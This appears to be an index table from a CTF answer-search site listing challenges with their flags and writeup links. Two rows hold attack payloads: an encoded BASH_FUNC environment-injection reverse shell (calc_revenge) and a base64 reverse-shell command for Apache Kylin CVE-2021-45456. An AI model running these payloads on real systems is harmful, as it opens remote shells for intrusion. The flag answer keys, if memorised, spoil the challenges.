[标题搜索]只能搜索题目标题,[综合搜索]支持多关键词多项目搜索(以空格分隔)。
| 序号 | Website | Type | Title | Value | Writeup | Competition | Id |
|---|---|---|---|---|---|---|---|
| 1 | CTFHUB | 工业控制(ICS) | 虚拟PLC | flag{myfiletypeisplcsim} | https://writeup.ctfhub.com/Challenge/... | 工业信息安全技能大赛 | 9754 |
| 2 | ctfshow | WEB入门.其他 | web398 | ctfshow{eb05151d-c00c-4c2a-8cf5-72a47f889d85} | https://blog.csdn.net/Myon5/article/d... | 其他 | 3706 |
| 3 | bugku | IOT | enr | byuctf{-0oMx2k2Xh8R2h9Z7Yl6Yg3H9Yx5j0GpJ0Vl5GpF4Xx1K3U1Dx4Y6V5F6Xk1Gk1Vl6Dk1U5N4Yl9U0U} | https://ctf.bugku.com/challenges/deta... | BYUCTF2024 | 2385 |
| 4 | XCTF | Crypto | in-plain-sight | utflag{SpeciaL_Permissionz} | https://blog.csdn.net/CleverLee0/arti... | CTF | 9628 |
| 5 | BUUCTF | Web | [HITCON 2017]SQL So Hard | 无 | https://www.jianshu.com/p/701e6342cd71 | HITCON 2017 | 6867 |
| 6 | NSSCTF | MISC | [KPCTF 2024 决赛]calc_revenge | [[str]for[ᵒs.environ['BASH\x5fFUNC\x5fecho%%']]in[['\x28\x29\x20\x7b\x20\x62\x61\x73\x68\x20\x2d\x69\x20\x3e\x26\x20\x2f\x64\x65\x76\x2f\x74\x63\x70\x2f\x78\x78\x2e\x78\x78\x2e\x78\x78\x2e\x78\x78\x2f\x78\x78\x78\x78\x20\x30\x3e\x26\x31\x3b\x7d']]] | https://ctf.njupt.edu.cn/archives/805 | KPCTF | 12316 |
| 7 | XCTF | Web | unfinish | flag{web_flag} | https://blog.csdn.net/qq_46143339/art... | 网鼎杯 2018 | 9277 |
| 8 | NSSCTF | TEA | [GDOUCTF 2023]Tea | NSSCTF{hzCtf_94_re666fingcry5641qq} | https://blog.csdn.net/qq_73682634/art... | GDOUCTF | 10656 |
| 9 | vulfocus | WEB | kylin 命令注入 (CVE-2021-45456) | Apache Kylin命令注入漏洞CVE-2021-45456的利用方式为:攻击者通过构造恶意项目名称(如nohupshcechoc2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC4xLjEwNS8xMjM0NSAwPiYxCgbase64d),在访问诊断接口时通过反引号执行任意命令(如nohup sh -c "$(echo c2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC4yLjQ4LzEyMzQ1IDA+JjE= | base64 -d)"... | - | 16516 |
| 10 | bugku | MISC | Unfoldable | idek{w0w_you_c4n_r3ally_f0ld} | https://ctftime.org/writeup/31828 | idekCTF2021 | 2723 |